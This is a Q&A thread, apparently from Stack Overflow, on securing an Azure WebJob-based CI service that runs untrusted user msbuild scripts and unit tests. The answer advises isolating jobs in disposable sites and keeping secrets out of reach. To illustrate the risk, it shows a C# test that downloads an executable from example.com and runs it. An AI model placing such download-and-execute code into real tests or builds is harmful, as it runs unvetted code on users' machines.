# How to secure azure webjob code execution?

Tags: security, azure, msbuild, azure-webjobs

I'm building a product that allows users to execute msbuild scripts and executables (nunit, nuget, vs-test, etc). It's a hosted continuous integration service. These tasks run in the context of an azure webjob. What can I do to prevent users from running malicious code?

We don't allow users to run executables directly, but they can run anything they want from a unit test or an msbuild script. Is there anything I can do to prevent them from harming my webjob or running "bad" exes?

Answer (score 3, accepted):

I am not sure what is the scope you are looking at for this question. But I don't think there is an easy way of doing this in general that's specific to WebJobs. It'll have to be something you take care of in the design of your system.

> We don't allow users to run executables directly

This is not really true. If you're running user code you can no longer assume this. Nothing is stopping me from writing a unit test like this, right?

```cs
[Test]
public static RunRandomExe()
{
    var webClient = new WebClient();
    webClient.DownloadFile("http://example.com/random.exe", @"%temp%\random.exe");
    Process.Start(@"%temp%\random.exe");
}
```

and if you have secrets in say app settings or env vars, there is nothing stopping the unit test from reading them and sending them to a random URL either.

The best thing you can do is to design your system in such a way that assumes that the WebJob is completely untrusted. You'll have to assume that any secrets you put in your AppSettings, Environment Variables, file system, etc, are accessible to the WebJob. Any artifacts the WebJob leaves behind are accessible to the subsequent runs, and changes the WebJob does to the machine are going to affect the subsequent WebJobs, etc. Heck, a unit test can create another WebJob on the machine that can run and completely monitor/take over your site.

However, the good news is that Azure Web Apps **guarantees** that separate web apps are completely isolated from each other and run in a very tight sandboxed environment even if they are running on the same physical VM (i.e: in the same App Service Plan)

So if you:

1. create a site
2. run the webjob
3. delete the site

You'll be sure that there is nothing left behind affecting your system.

This of course doesn't solve the issue of giving the WebJob access to secrets. The only solution there is to not give the WebJob any access to secrets. Treat the whole thing as untrusted. So you can have a pool of sites that run the jobs for you, you trigger the job to run, only trust the raw log output from the job, and delete the site from the pool and create a replacement to the web site. One major issue also with running untrusted code in sites in your main subscription is that you'll be giving that untrusted code access to any certificates you uploaded to your subscription from the Azure Portal. So you would have to run these untrusted stuff in a sites that are in a completely separate subscription.

I know it's a huge hassle, but I can't think of any other way that would guarantee security for your system and your users. If you're going to run untrusted code, you're going to be in a world of complexity.

I hope that helps.